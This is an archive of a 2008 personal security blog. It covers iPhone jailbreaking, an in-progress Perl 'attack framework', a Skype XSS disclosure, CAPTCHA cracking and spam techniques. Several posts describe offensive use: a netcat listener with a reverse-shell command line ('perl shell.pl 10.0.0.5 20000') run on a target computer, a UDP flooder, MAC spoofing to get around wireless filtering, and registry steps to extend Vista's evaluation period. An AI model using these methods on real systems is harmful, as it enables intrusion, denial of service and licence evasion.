Thursday, January 31, 2008

DEATH AND TAXES 2008 POSTER

Are you interested on U.S. departments ?
Here in California I often hear lots of acronyms like NSF, NSA, NASA and so forth. Of course I know the most famous U.S departments; who doesn't know them ! Everybody has watched a police movie or a thriller one, but believe me there are more departments that you can guess. So this morning I found this interesting map which shows departments and relative U.S taxes.
To me, it's pretty interesting, so I wanna share it with you. Click on the map to see the full resizable map.



Wednesday, January 30, 2008

Today Only Thank you Guys.

Hi folks,
today I wanna just say thank you for visiting my poor WB.
This is my actually Cluster Map.


Tuesday, January 29, 2008

Yes, CAPTCHA Has Been Cracked.


It seems very important speaking about CAPTCHA recognition. To me, this is not a "big" news; it's from many years that scientific community developed lots of "vision-recognition" algorithms able to exploit the most moderns CAPTCHA engines. Anyway tonight I wanna point out this interesting work from "The Russian hackers" team.
You can find the Project here.
Actually they reach the 35% of accuracy, that doesn't sound like a big deal but if you consider that an attacker performs 100,000 CAPTCHA attacks per day, the 35% becomes a great threshold.

PS: in order to see the project you need at least MATLAB 2007.

Related Works:

PWNtcha "A very good captcha, but not always human-solvable” .

CAPTCHA decode.“Very difficult method”.

CAPTCHA.ru. Another very interesting CAPTCHA decoder

The Super Secret iPhone KEY !

Another interesting issue comes from Google. Everybody knows making "strange" (maybe it's better to say: forged) requests to google search engine, you can obtain lots of hidden informations. But today, to me, is more and more easier.
Try the Super Secret iPhone KEY. It's amazing to see that. No forged requests, No strange sentences presents inside the pages, No strange parameters like "id=-123" or "index=log", Not encoded word.. No more secrets ? At least, ..., some times ago was less easier to find something like that, but what about now ? Again, I'm envious, Google search algorithms are the best.

Monday, January 28, 2008

Is Microsoft Making Zero Day Exploits ?

They are suggesting to buy a MAC ?
Here some fews sentences:

"Unconfirmed sources report that draft recommendations from Microsoft on how to defeat the Zero Day problems includes buying an Apple iMac Computer. The draft document printed on internal Microsoft letterhead was leaked to Unconfirmed Sources by a member of the Zero Day crisis team that has been working around the clock in Redmond, home of Microsoft."


Here the source.

Saturday, January 26, 2008

Fixing Installer Errors

Hi folks,
today, as lots of people I was in a internet cafe trying to update my iPhone, from 1.1.1 to 1.1.3. Before starting the procedure I decided to update some of my softwares, for example OpenSSH, Installer and so for. During the last upgraded (Installer.app) my iphone ran outside the disk space and the installation process was broken. The result ? Installer.app application didn't start. It was orrible, you know, without Installer.app you can not install 3rd p. application included the 1.1.3 soft upgrade.



So, let me write this post describing how to prepare you iPhone to the "big" upgrade.
First of all Backup your iPhone ! If something goes wrong you gotta restore your device, that means lose all your personal information like: Contacts, Configurations, Messages, Mails and so on.... I really don't know if there's an application which does that; but it's so easy using the shell in order to move some files that, to me, it makes no sense installing another application.
You need to backup these folders:



Then, you need more free space. If your device is running out of disk space means that the Installer partition (not Media) is full. In others words, if you've seen something like that:


You need to modify some files location.You can follow two ways:
The first one is the easiest, log-into your device via SSH and move your Application Folder using the following commands:



With these commands you move the Application folder and you create a link to the new location.
The second solution needs to install another software on your iPhone (available in Installer.app) named "Fix Disk Space"



Ok, now you got a backup and you have just fixed the disk space problem. Now shell we try to fix Installer application. Installer.app usually stores the temp files in /var/root/Library/Installer/Temp. If the installation has been wrong, you'll find here the zip file because the Installer.app deletes the sources only at the end of the installations process. Here it is !



Well, now you can overwrite your Installer.app file located in /var/root/ROOT_Applications with the decompressed file found in the Temp folder. Now you got enough space to do that and you're iPhone has been fixed. You are ready to upgrade you firware.

Wednesday, January 23, 2008

News On 1.1.3

Another firmware analysis from cre.ations.net has shown that 1.1.3 has been changed significantly.
As you probably remember the previous firmware versions run application with root rights. On the other hand 1.1.3 runs application as mobile user rather then root. Another big difference is on the configuration files that have been placed on /var/mobile instead of /var/root. Moreover SpringBoard no longer requires SummberBoard for scrolling pages.
All this stuff means that 1.1.3 is ready for SDK apps; in others words it seems ready for official installable applications. This is a great news !! However if you try to launch Installer on 1.1.3 it shows the following output.


Next step probably will be find a hole grabbing the root rights..... Unfortunately this time I'm still waiting, doing nothing.

Monday, January 21, 2008

Yet iPhone Perl Framework.

Hi folks,
as I announced some posts ago I worked on a very easy and simple Perl BackDoor.



This one is another script to add at iPhone's Perl Framework. Well, I really don't know how it could be useful, but having a pretty complete framework sounds very interesting. As you can see it's pretty easy; no encoded code, no useless variables, no obfuscating and so on. Let me try with a little example.
First of all on your iPhone start a NetCat BackDoor on port 2000 like the following picture:



Then inject the previous perl shell on target computer and link out it on your iPhone, for example:


execution string: perl shell.pl 10.0.0.5 20000



After the connection on yours iPhone shell appears the "welcome message" :



Now you got the attacked computer.



Pretty nice, isn't it ?
Some of you guys, are still asking where it's possible to download the entire framework, well actually I haven't posted it in someplace because before I wanna finish it. Anyway, I'll write you back when I'll finish it !

Sunday, January 20, 2008

1.1.3 Jailbroken .

Only yesterday the iPhone's blogs talked about the 1.1.2 UNLOCK and today,
they announced the 1.1.3 jailbroken that's amazing.



Apple iPhone has became a great case of study:
Is it interesting studying how to patch compromised software or it's pretty more interesting studying a general solution ?
Why Apple is still patching its software rather then developing a general solution ?

Friday, January 18, 2008

Vista For Free ?!!

Maybe the today's most important news is about the iPhone 1.1.2 unlocking. You can find a lot of stuff around the NET. But I found another interesting "hack" against Windows Vista that, to me, is very important and in same way really funny. It's passing in second way, of course the iPhone Unlocking is the Topic of The Day. For this reason I'm writing on Vista: How To Use Legally Windows Vista for One Year, WithOut License.

It's seems pretty easy:

1) Start -> Execute, type sysprep /generalize.
Now, rebooting you PC you'll have others 30 days of evaluation time. :-D. This procedure has been called rearm of the machine and you can do it 3 times. When your 90 days are going to expire you can look into Windows register ;-) .

2) Open your' regedit and find the following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SL
Now change SkipRearm to 1, for instance: (DWORD: 00000001). Now with administrator rights type Sysprep /generalize, reboot your system and after that using slmgr –xpr you can recognize when your Vista will expire.


Now you can use it for a long time....... but I'm pretty sure that you'll format it as soon as this hack will work.

Again, Perl framework.

Hi folks,
Today I wanna point out another easy script written in perl for my iPhone "attack" Framework.
The following script is an easy UDP flodder. I know, maybe having an UDP flodder in our framework it's not a big deal and sincerely I think it's not so much useful. Anyway, guarantee the framework completeness could be a great justification to this little work.



Well, after these few perl files I'll focus my brain on another perl problem: backdoor's one. I wanna write not a specific and "perfect" backdoor, but an easy and really portable backdoor within minimal and poor code. As you've seen I'm not a IO:Socket fan I prefer the standard Socket package. This sentence to underline the simplicity of the code that I'm going to write. Often completeness is synonymous of hard to read and to understand, this time I'm running to make an complete "attack" framework easy to read and for this reason easy to understand.

Skype Videomood Vulnerability

In new skype video chat, every user is able to insert a video in his own mood.
And this is the result:

1) Prepare your XSS injection

(Pics from critical)

2) Exploit it !


(Pics from critical)

It seems that skype trusts on 3rd part links without control-it !



We were able to find some permanent XSS vectors in dailymotion.com: videos have a 'Title' field, which is not properly filtered and returned to user in certain conditions. So it becomes possible to execute malicious script content when user is searching for a video to add to his mood. You may also test it by entering word 'saugumas' in dailymotion.com video search field.




Original post: ( http://seclists.org/fulldisclosure/2008/Jan/0328.html )

Wednesday, January 16, 2008

Changing MAC on iPhone

Hey folks,
today I wanna point out a very easy script that I made for iPhone (cangeMAC.pl).
It's pretty useful changing MAC address, especially if you need a filtered wireless connection.
First of all you gonna use that script (sniffer.pl) to grab the allowed connection:




Or if you prefer, you may use tcpdump by command line (thank to iPhone Terminal).
After that, you gonna use this little, but useful script changing your default MAC address :



And Here you are; just typing ifconfig on your iPhone Terminal you'll see your new MAC address.

Tuesday, January 15, 2008

Say Hello to "MacBook AIR"

The last of the MacBook family:it's incredible flat, incredible smart but without ethernet :-(.
Only Wireless, 802.11n; if you wanna a cable with only $19 you'll buy a little ethernet-to-usb converter.
Well, I agree with Apple: we don't need a CD-DVD-reader, you can share the desktop's DVD player... Personally I never use my CD\DVD\ Combo... Again with only $99 you can buy it... BUT notebook without native ethernet plug, it's a very strong assumption.
Anyway here it is !

Monday, January 14, 2008

iPhone Perl Framework

Hi Folks today I discovered Perl for iPhone. You know, Perl is one of my favorite scripting languages, it's easy, flexible, fast and it's extremely "network adapted". That means you can easily write some network based applications. So I wanted a portable attack framework , for my iPhone. I need some basic feature, like a sniffer a port scanner an UDP packet generator, an TCP packet forger and so on... Let's go I started writing a nice WebSniffing tool and an easy port scanner. But it's only the beginning of a bigger attack iPhone's attack framework.

Here 2 little example:

An easy MAC address change:



And easy port map scanner:



If some one is interested to help me building a biger Attack Framework please mail me: mramilli (acircle) gmail dot com .

Sunday, January 13, 2008

Friday, January 11, 2008

This Election Day Hack Diebold !!!!

Thank you Matt for the wonderful Picture !!! :-D :-D


Thursday, January 10, 2008

An Interesting Spam Technique

Hi Folks,
today I wanna point out an interesting technique used from spammers. Actually, I'm not newbie in Spam but this specific methodology I've never seen before. Of course, the most interesting question for a spammer is : " Is it possible to bypass a spam filter ?". This methodology is able to do that using a trusted mirror. Nowadays google is one of the best search engine in the NET and lots of people use it, for this reason it's pretty difficult close any "google link". Here we go ! Spammer may use google as a mirror exploiting spam filters.

Also in my email box:



The URL doesn't link directly the malicious site, it seems a regular google search string. A very restrictive one; in fact:

http://www.google.co.uk///search?hl=en&q=inurl%3Athereseason.com+V6J+5C6&btnI=745

means:
"search all sites that have in the url the words: thereseason.com, V6J and 5C6, then open it !". The parameter btnI is the result of "I'm Feeling Luky" in google research. If you try to execute this link you'll open the Canadia Pharmacy:



It's still interesting analyzing the URL, let me try to search on google the following string:

http://www.google.co.uk///search?hl=en&q=inurl%3Athereseason.com+V6J+5C6

Without the btnI parameter. And... It's true !! No many sites, only one.



According to F-Secure, there are lots of this spam going around, with different discount percentage and different senders.



Just one endnote ....
To me, It's pretty easy guessing and/or building an unique search string with google advanced features like this one. How can spam filters prevent that ? Is It possible to deny all the google's "I'm feeling luky" search strings ? It seems a new and good challenge for Anti-Spammers .

Tuesday, January 8, 2008

When Miss Configuration Becomes A Serious Problem.

Today I wanna report an important bug dues to miss configuration system.
The Miss Configuration Bug (MCB) affects the website of the Department of Security and Health, in Malaysia. Up to 200 mails and password are included in this directory listing.



I Know, it's incredible, lots of mails and lots of password "free" in the net, moreover in a Excel paper...
It's another example of security evangelist lack.


Related Reading: 1 and 2.
VIA security.my.

Sunday, January 6, 2008

Yet, US Voting Machines


(Picture From The NewYorkTimes)

Thank to "The New York Times" we have a really nice brief on what is happening in US election system.
As you probably know, in US during last decade several problems on Voting Machine have been happened.
I dont want explain the problems neither listing them, I dont want say that the "software-blocking-problems" are only a small part of a bigger problem set, I just wanna say to you; if you're interested on' em; read this paper. I know ten pages are long to read, but at the end you'll have a great landscape on US-Electronic Voting System.

Saturday, January 5, 2008

Thinking on Puppet.

This is a new Administration system ..... Actually I've no idea if it's secure or not and if it works correctly, but I like the idea and I wanna share it.I'm also thinking on possible integration with RoboAdmin system.

Some sentences and pics from the site :

Puppet is a declarative language for expressing system configuration, a client and server for distributing it, and a library for realizing the configuration.





Each client contacts the server periodically (every half hour, by default), gets its latest configuration, and makes sure it is in sync with that configuration. Once done, it can send a report back to the server indicating what, if anything, happened. This diagram shows the data flow in a regular Puppet implementation.


It sucks as a reverse Nagios system. Nagios server keeps from clients, the system configurations monitoring the current state. On the other hand Puppet send configurations to multiple clients. It seems interesting...

Thursday, January 3, 2008

Strange Connections ... ...

Thank Sean (UCD), I've just discovered these strange connection.... made by Apple and Adobe.




Both Apple and Adobe ask a connection to 192.168.112.2o7.net. If you try a tcp connection on port 80 you can grab the banner discovering that : The IP-Addresses are owned by OMNITURE. What is OMNITURE ?
From this page:


With Omniture, large volumes of data generated by Web sites and other business systems can be captured, stored and analyzed to:
Measure trends and customer behavior in real-time
Provide real-time, high-performance analysis and reporting for all levels of business users
Automate new online processes
Optimize overall business performance
As a result, Omniture customers can more fully leverage the Internet to increase revenues, improve customer service and operational efficiency, and maintain a competitive edge. Omniture has experienced rapid growth as the company's solutions have been adopted across organizations of all sizes and industries. Omniture has been recognized by:
The Inc. 500 List of America's Fastest-Growing Companies
The Deloitte Technology Fast 500


So it's is a "behavioral analytics firm" ..... A "behavioral analytics firm" ?? What the meaning ?? Are they spy us ?
Well I totally agree with he :
The iTunes MiniStore sends data to the same scammy-looking “192.168.112.2o7” Omniture-owned web server that Adobe CS3 apps do. There’s no reason to use a server address like this other than to hope to slip past firewall filters misconfigured to allow traffic matching a wildcard pattern like “192.168.*”.

It's pretty amazing ... well ... I've wrote "pretty" because at-the-end-of-the-day this is the most known security problem of ever. I mean it's Trusting Software. You can trust only your own application !! Moreover, it's not true if you're using high level languages like Java, .NET and so for.. You can not know exactly what 3rd-part softwares are doing on your machine... Again, Diebold voting machines teaches us. So what we can do ? Is it possible analyzing every connection and reverser-engineering every software ? Obviously not. You "may" trust....

Here some interesting reading about that.
blogs.adobe.com
blogs.adobe.com (second interesting post)
uneasysilence.com